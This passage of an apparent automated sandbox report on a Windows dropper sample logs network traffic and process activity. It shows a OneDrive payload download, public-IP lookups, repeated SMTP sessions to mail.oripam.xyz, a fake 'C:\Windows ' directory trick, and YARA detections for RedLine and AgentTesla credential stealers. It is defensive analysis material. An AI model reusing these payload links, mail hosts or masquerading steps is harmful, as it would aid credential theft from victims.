Jan 24, 2024 21:32:33.228807926 CET	587	49753	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:33.230091095 CET	49753	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:33.439322948 CET	587	49753	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:33.439718008 CET	49753	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:33.649218082 CET	587	49753	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:33.649627924 CET	49753	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:33.866523981 CET	587	49753	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:33.867002010 CET	49753	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:34.075985909 CET	587	49753	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:34.076378107 CET	49753	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:34.298979998 CET	587	49753	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:34.299403906 CET	49753	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:34.508594036 CET	587	49753	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:34.509021044 CET	49753	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:34.509021044 CET	49753	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:34.509021044 CET	49753	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:34.509021044 CET	49753	587	192.168.2.4	185.56.136.50
Jan 24, 2024 21:32:34.717880011 CET	587	49753	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:34.718055010 CET	587	49753	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:34.718065977 CET	587	49753	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:34.718075037 CET	587	49753	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:34.721167088 CET	587	49753	185.56.136.50	192.168.2.4
Jan 24, 2024 21:32:34.771966934 CET	49753	587	192.168.2.4	185.56.136.50

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 24, 2024 21:31:55.800633907 CET	56325	53	192.168.2.4	1.1.1.1
Jan 24, 2024 21:31:56.846369982 CET	51152	53	192.168.2.4	1.1.1.1
Jan 24, 2024 21:32:00.959964037 CET	59022	53	192.168.2.4	1.1.1.1
Jan 24, 2024 21:32:01.078908920 CET	53	59022	1.1.1.1	192.168.2.4
Jan 24, 2024 21:32:02.886241913 CET	62457	53	192.168.2.4	1.1.1.1
Jan 24, 2024 21:32:03.319752932 CET	53	62457	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 24, 2024 21:31:55.800633907 CET	192.168.2.4	1.1.1.1	0x85a8	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)	false
Jan 24, 2024 21:31:56.846369982 CET	192.168.2.4	1.1.1.1	0x5e46	Standard query (0)	ypfgrg.sn.files.1drv.com	A (IP address)	IN (0x0001)	false
Jan 24, 2024 21:32:00.959964037 CET	192.168.2.4	1.1.1.1	0x3d66	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Jan 24, 2024 21:32:02.886241913 CET	192.168.2.4	1.1.1.1	0x6612	Standard query (0)	mail.oripam.xyz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 24, 2024 21:31:55.920281887 CET	1.1.1.1	192.168.2.4	0x85a8	No error (0)	onedrive.live.com	web.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 24, 2024 21:31:55.920281887 CET	1.1.1.1	192.168.2.4	0x85a8	No error (0)	web.fe.1drv.com	odc-web-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 24, 2024 21:31:55.920281887 CET	1.1.1.1	192.168.2.4	0x85a8	No error (0)	odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.net	dual-spov-0006.spov-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 24, 2024 21:31:55.920281887 CET	1.1.1.1	192.168.2.4	0x85a8	No error (0)	dual-spov-0006.spov-msedge.net		13.107.139.11	A (IP address)	IN (0x0001)	false
Jan 24, 2024 21:31:55.920281887 CET	1.1.1.1	192.168.2.4	0x85a8	No error (0)	dual-spov-0006.spov-msedge.net		13.107.137.11	A (IP address)	IN (0x0001)	false
Jan 24, 2024 21:31:57.023960114 CET	1.1.1.1	192.168.2.4	0x5e46	No error (0)	ypfgrg.sn.files.1drv.com	sn-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 24, 2024 21:31:57.023960114 CET	1.1.1.1	192.168.2.4	0x5e46	No error (0)	sn-files.fe.1drv.com	odc-sn-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 24, 2024 21:32:01.078908920 CET	1.1.1.1	192.168.2.4	0x3d66	No error (0)	api.ipify.org	api4.ipify.org		CNAME (Canonical name)	IN (0x0001)	false
Jan 24, 2024 21:32:01.078908920 CET	1.1.1.1	192.168.2.4	0x3d66	No error (0)	api4.ipify.org		173.231.16.75	A (IP address)	IN (0x0001)	false
Jan 24, 2024 21:32:01.078908920 CET	1.1.1.1	192.168.2.4	0x3d66	No error (0)	api4.ipify.org		64.185.227.156	A (IP address)	IN (0x0001)	false
Jan 24, 2024 21:32:01.078908920 CET	1.1.1.1	192.168.2.4	0x3d66	No error (0)	api4.ipify.org		104.237.62.211	A (IP address)	IN (0x0001)	false
Jan 24, 2024 21:32:03.319752932 CET	1.1.1.1	192.168.2.4	0x6612	No error (0)	mail.oripam.xyz	oripam.xyz		CNAME (Canonical name)	IN (0x0001)	false
Jan 24, 2024 21:32:03.319752932 CET	1.1.1.1	192.168.2.4	0x6612	No error (0)	oripam.xyz		185.56.136.50	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

onedrive.live.com

api.ipify.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	13.107.139.11	443	7048	C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe

Timestamp	Bytes transferred	Direction	Data
2024-01-24 20:31:56 UTC	213	OUT	GET /download?resid=31BDC6BCA3597F9E%21304&authkey=!ACV5OIy1dzif_BE HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: onedrive.live.com
2024-01-24 20:31:56 UTC	1176	IN	HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: -1 Location: https://ypfgrg.sn.files.1drv.com/y4mbejU0zcnLb8KIWNqfLsU3N_rsqNxx32XcbH8LaSJJsucoEjYDeg2UbWhApyywdORi-rM-BIJEnDaUVVVpL2Pu2QtMXxLbMBmk-viex5mWSfWxIEYocoTRxBY4zUuNOGX3XflaqQCpgOUU4Y4XzXQO1EY1MaqrdX3eJo-aHnfQCB2m2Qu-tLfo3JigWTLkHJo0rie07s3ZbKrnZBg3n-aUA/255_Clmgncrswyc?download&psid=1 Set-Cookie: E=P:bXssghsd3Ig=:AM0Pzu2CG8A8pDIOAIYJ640M8XKnpRlKlXJfQ7UTitA=:F; domain=.live.com; path=/ Set-Cookie: xid=9cd6455a-c95a-4ca6-8a8d-9baac9895532&&ODSP-ODWEB-ODCF&56; domain=.live.com; path=/ Set-Cookie: xidseq=1; domain=.live.com; path=/ Set-Cookie: LD=; domain=.live.com; expires=Wed, 24-Jan-2024 18:51:56 GMT; path=/ Set-Cookie: wla42=; domain=live.com; expires=Wed, 31-Jan-2024 20:31:56 GMT; path=/ X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-MSNServer: 6fb577fb65-nkcwq X-ODWebServer: nameastus2946819-odwebpl X-Cache: CONFIG_NOCACHE X-MSEdge-Ref: Ref A: C09A13CB73AB4E73B5E42DDF71C08B1A Ref B: BN3EDGE0614 Ref C: 2024-01-24T20:31:56Z Date: Wed, 24 Jan 2024 20:31:56 GMT Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	173.231.16.75	443	5660	C:\Users\Public\Libraries\srcngmlC.pif

Timestamp	Bytes transferred	Direction	Data
2024-01-24 20:32:01 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-01-24 20:32:01 UTC	157	IN	HTTP/1.1 200 OK Server: nginx/1.25.1 Date: Wed, 24 Jan 2024 20:32:01 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin
2024-01-24 20:32:01 UTC	12	IN	Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 37 34 Data Ascii: 81.181.57.74

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49737	13.107.139.11	443	6472	C:\Users\Public\Libraries\Clmgncrs.PIF

Timestamp	Bytes transferred	Direction	Data
2024-01-24 20:32:12 UTC	213	OUT	GET /download?resid=31BDC6BCA3597F9E%21304&authkey=!ACV5OIy1dzif_BE HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: onedrive.live.com
2024-01-24 20:32:12 UTC	1176	IN	HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: -1 Location: https://ypfgrg.sn.files.1drv.com/y4msDhUEASrFMIPv49fXAzT4qs4bguIHP4CCd0btJ0hrPPN2V-ZqBRXsYtcVL3jQXO7r49r719ro5RJTPzdUGbNpVlDu6dxs6YKOfnn5vu8QA0rHm8n14Q90NovCLmZqqoN8XVzOwGcF1aGZm0G1c8M1871I6jKNz42Ys7HBxX54CPR5mfvEVTfIT3VZFI557mWsnf1zyAKULP1oIZfoepMlQ/255_Clmgncrswyc?download&psid=1 Set-Cookie: E=P:ngmnixsd3Ig=:YpGhyMKxUK5CqKIbdpklzOKv5SVDTN3ZiBH7lK6M4M4=:F; domain=.live.com; path=/ Set-Cookie: xid=a0d175d1-2acf-4f55-8d3e-fbe93f7f16e6&&ODSP-ODWEB-ODCF&56; domain=.live.com; path=/ Set-Cookie: xidseq=1; domain=.live.com; path=/ Set-Cookie: LD=; domain=.live.com; expires=Wed, 24-Jan-2024 18:52:12 GMT; path=/ Set-Cookie: wla42=; domain=live.com; expires=Wed, 31-Jan-2024 20:32:12 GMT; path=/ X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-MSNServer: 6fb577fb65-mktkw X-ODWebServer: nameastus2946819-odwebpl X-Cache: CONFIG_NOCACHE X-MSEdge-Ref: Ref A: DA2F59C871A44681BFDDEB5FF5524C90 Ref B: BN3EDGE0406 Ref C: 2024-01-24T20:32:12Z Date: Wed, 24 Jan 2024 20:32:12 GMT Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49744	173.231.16.75	443	6348	C:\Users\Public\Libraries\srcngmlC.pif

Timestamp	Bytes transferred	Direction	Data
2024-01-24 20:32:16 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-01-24 20:32:17 UTC	157	IN	HTTP/1.1 200 OK Server: nginx/1.25.1 Date: Wed, 24 Jan 2024 20:32:17 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin
2024-01-24 20:32:17 UTC	12	IN	Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 37 34 Data Ascii: 81.181.57.74

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49747	13.107.139.11	443	1028	C:\Users\Public\Libraries\Clmgncrs.PIF

Timestamp	Bytes transferred	Direction	Data
2024-01-24 20:32:19 UTC	213	OUT	GET /download?resid=31BDC6BCA3597F9E%21304&authkey=!ACV5OIy1dzif_BE HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: onedrive.live.com
2024-01-24 20:32:19 UTC	1176	IN	HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: -1 Location: https://ypfgrg.sn.files.1drv.com/y4msfS_e270PF1WCCn3T5ASjYfsXiOpfH10UgaOZ4PL-nRYDMKHbDGEjKzr8Rs0CmTqGLk2aEyd5TVrICQv6GF9S2SwwvIpSEQuY_jr0GwrGYS7GbcrTiyFcPIT_dNV5k0WL0N15uggdXDG4HTwvOSbI_VKUqd9CT55TJnIYdam_1kSAnAuaB0AGhd4VHLoBDsmR9mIlJcWACTKxswzqg9STg/255_Clmgncrswyc?download&psid=1 Set-Cookie: E=P:vk3Tjxsd3Ig=:NxxprAJVbc4yysa0k+z3XY6QuC7kaw8c3v+EIjXgk4c=:F; domain=.live.com; path=/ Set-Cookie: xid=bbac1309-0994-4640-a84e-c37587011320&&ODSP-ODWEB-ODCF&56; domain=.live.com; path=/ Set-Cookie: xidseq=1; domain=.live.com; path=/ Set-Cookie: LD=; domain=.live.com; expires=Wed, 24-Jan-2024 18:52:19 GMT; path=/ Set-Cookie: wla42=; domain=live.com; expires=Wed, 31-Jan-2024 20:32:19 GMT; path=/ X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-MSNServer: 6fb577fb65-5v6dj X-ODWebServer: nameastus2946819-odwebpl X-Cache: CONFIG_NOCACHE X-MSEdge-Ref: Ref A: 29C88B9992624A9E8D31B04D81C2D6DB Ref B: BN3EDGE1113 Ref C: 2024-01-24T20:32:19Z Date: Wed, 24 Jan 2024 20:32:19 GMT Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49750	173.231.16.75	443	6164	C:\Users\Public\Libraries\srcngmlC.pif

Timestamp	Bytes transferred	Direction	Data
2024-01-24 20:32:23 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-01-24 20:32:23 UTC	157	IN	HTTP/1.1 200 OK Server: nginx/1.25.1 Date: Wed, 24 Jan 2024 20:32:23 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin
2024-01-24 20:32:23 UTC	12	IN	Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 37 34 Data Ascii: 81.181.57.74

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Jan 24, 2024 21:32:03.750426054 CET	587	49733	185.56.136.50	192.168.2.4	220-terminal7.veeblehosting.com ESMTP Exim 4.96.2 #2 Thu, 25 Jan 2024 02:02:02 +0530 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jan 24, 2024 21:32:03.750741005 CET	49733	587	192.168.2.4	185.56.136.50	EHLO 065367
Jan 24, 2024 21:32:03.953141928 CET	587	49733	185.56.136.50	192.168.2.4	250-terminal7.veeblehosting.com Hello 065367 [81.181.57.74] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Jan 24, 2024 21:32:03.953315973 CET	49733	587	192.168.2.4	185.56.136.50	STARTTLS
Jan 24, 2024 21:32:04.156770945 CET	587	49733	185.56.136.50	192.168.2.4	220 TLS go ahead
Jan 24, 2024 21:32:06.793358088 CET	587	49734	185.56.136.50	192.168.2.4	220-terminal7.veeblehosting.com ESMTP Exim 4.96.2 #2 Thu, 25 Jan 2024 02:02:05 +0530 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jan 24, 2024 21:32:06.793535948 CET	49734	587	192.168.2.4	185.56.136.50	EHLO 065367
Jan 24, 2024 21:32:07.003293991 CET	587	49734	185.56.136.50	192.168.2.4	250-terminal7.veeblehosting.com Hello 065367 [81.181.57.74] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Jan 24, 2024 21:32:07.003446102 CET	49734	587	192.168.2.4	185.56.136.50	STARTTLS
Jan 24, 2024 21:32:07.213927031 CET	587	49734	185.56.136.50	192.168.2.4	220 TLS go ahead
Jan 24, 2024 21:32:09.930634975 CET	587	49735	185.56.136.50	192.168.2.4	220-terminal7.veeblehosting.com ESMTP Exim 4.96.2 #2 Thu, 25 Jan 2024 02:02:09 +0530 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jan 24, 2024 21:32:10.004050016 CET	49735	587	192.168.2.4	185.56.136.50	EHLO 065367
Jan 24, 2024 21:32:10.210422993 CET	587	49735	185.56.136.50	192.168.2.4	250-terminal7.veeblehosting.com Hello 065367 [81.181.57.74] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Jan 24, 2024 21:32:10.210701942 CET	49735	587	192.168.2.4	185.56.136.50	STARTTLS
Jan 24, 2024 21:32:10.417320013 CET	587	49735	185.56.136.50	192.168.2.4	220 TLS go ahead
Jan 24, 2024 21:32:18.434108973 CET	587	49745	185.56.136.50	192.168.2.4	220-terminal7.veeblehosting.com ESMTP Exim 4.96.2 #2 Thu, 25 Jan 2024 02:02:17 +0530 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jan 24, 2024 21:32:18.434583902 CET	49745	587	192.168.2.4	185.56.136.50	EHLO 065367
Jan 24, 2024 21:32:18.639543056 CET	587	49745	185.56.136.50	192.168.2.4	250-terminal7.veeblehosting.com Hello 065367 [81.181.57.74] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Jan 24, 2024 21:32:18.639930010 CET	49745	587	192.168.2.4	185.56.136.50	STARTTLS
Jan 24, 2024 21:32:18.845571995 CET	587	49745	185.56.136.50	192.168.2.4	220 TLS go ahead
Jan 24, 2024 21:32:21.463428020 CET	587	49749	185.56.136.50	192.168.2.4	220-terminal7.veeblehosting.com ESMTP Exim 4.96.2 #2 Thu, 25 Jan 2024 02:02:20 +0530 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jan 24, 2024 21:32:21.463587046 CET	49749	587	192.168.2.4	185.56.136.50	EHLO 065367
Jan 24, 2024 21:32:21.668500900 CET	587	49749	185.56.136.50	192.168.2.4	250-terminal7.veeblehosting.com Hello 065367 [81.181.57.74] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Jan 24, 2024 21:32:21.671657085 CET	49749	587	192.168.2.4	185.56.136.50	STARTTLS
Jan 24, 2024 21:32:21.877394915 CET	587	49749	185.56.136.50	192.168.2.4	220 TLS go ahead
Jan 24, 2024 21:32:25.291779995 CET	587	49751	185.56.136.50	192.168.2.4	220-terminal7.veeblehosting.com ESMTP Exim 4.96.2 #2 Thu, 25 Jan 2024 02:02:24 +0530 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jan 24, 2024 21:32:25.291975021 CET	49751	587	192.168.2.4	185.56.136.50	EHLO 065367
Jan 24, 2024 21:32:25.494040966 CET	587	49751	185.56.136.50	192.168.2.4	250-terminal7.veeblehosting.com Hello 065367 [81.181.57.74] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Jan 24, 2024 21:32:25.495248079 CET	49751	587	192.168.2.4	185.56.136.50	STARTTLS
Jan 24, 2024 21:32:25.698338985 CET	587	49751	185.56.136.50	192.168.2.4	220 TLS go ahead
Jan 24, 2024 21:32:28.391747952 CET	587	49752	185.56.136.50	192.168.2.4	220-terminal7.veeblehosting.com ESMTP Exim 4.96.2 #2 Thu, 25 Jan 2024 02:02:27 +0530 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jan 24, 2024 21:32:29.414364100 CET	49752	587	192.168.2.4	185.56.136.50	EHLO 065367
Jan 24, 2024 21:32:29.617675066 CET	587	49752	185.56.136.50	192.168.2.4	250-terminal7.veeblehosting.com Hello 065367 [81.181.57.74] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Jan 24, 2024 21:32:29.617830992 CET	49752	587	192.168.2.4	185.56.136.50	STARTTLS
Jan 24, 2024 21:32:29.822175980 CET	587	49752	185.56.136.50	192.168.2.4	220 TLS go ahead
Jan 24, 2024 21:32:32.375822067 CET	587	49753	185.56.136.50	192.168.2.4	220-terminal7.veeblehosting.com ESMTP Exim 4.96.2 #2 Thu, 25 Jan 2024 02:02:31 +0530 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jan 24, 2024 21:32:32.376234055 CET	49753	587	192.168.2.4	185.56.136.50	EHLO 065367
Jan 24, 2024 21:32:32.585372925 CET	587	49753	185.56.136.50	192.168.2.4	250-terminal7.veeblehosting.com Hello 065367 [81.181.57.74] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Jan 24, 2024 21:32:32.585629940 CET	49753	587	192.168.2.4	185.56.136.50	STARTTLS
Jan 24, 2024 21:32:32.795686960 CET	587	49753	185.56.136.50	192.168.2.4	220 TLS go ahead

Target ID:	0
Start time:	21:31:54
Start date:	24/01/2024
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
Imagebase:	0x400000
File size:	1'693'184 bytes
MD5 hash:	39AD433C9BA920E7FD0961C66AC7079E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.1705935072.000000007EA90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000003.1683696452.000000007EA40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	21:31:57
Start date:	24/01/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ClmgncrsO.bat" "
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	21:31:58
Start date:	24/01/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	21:31:58
Start date:	24/01/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c mkdir "\\?\C:\Windows "
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	21:31:58
Start date:	24/01/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	21:31:58
Start date:	24/01/2024
Path:	C:\Users\Public\Libraries\srcngmlC.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\srcngmlC.pif
Imagebase:	0x400000
File size:	175'800 bytes
MD5 hash:	22331ABCC9472CC9DC6F37FAF333AA2C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.1851440244.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.1851440244.0000000000450000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000003.1685796375.00000000301E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000003.1685796375.00000000301E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1877516776.0000000031C20000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1877516776.0000000031C20000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000001.1683699497.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1879252508.00000000344A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1879252508.00000000344A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000005.00000002.1879252508.00000000344A0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1877750905.0000000031F54000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1877750905.0000000031F54000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.1851440244.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000005.00000002.1851440244.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1879908602.0000000034C10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1879908602.0000000034C10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000005.00000002.1879908602.0000000034C10000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000001.1683699497.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000005.00000001.1683699497.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1879002850.0000000032F01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1879002850.0000000032F01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000001.1683699497.0000000000450000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 3%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	21:32:09
Start date:	24/01/2024
Path:	C:\Users\Public\Libraries\Clmgncrs.PIF
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Clmgncrs.PIF"
Imagebase:	0x400000
File size:	1'693'184 bytes
MD5 hash:	39AD433C9BA920E7FD0961C66AC7079E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 53%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	21:32:13
Start date:	24/01/2024
Path:	C:\Users\Public\Libraries\srcngmlC.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\srcngmlC.pif
Imagebase:	0x400000
File size:	175'800 bytes
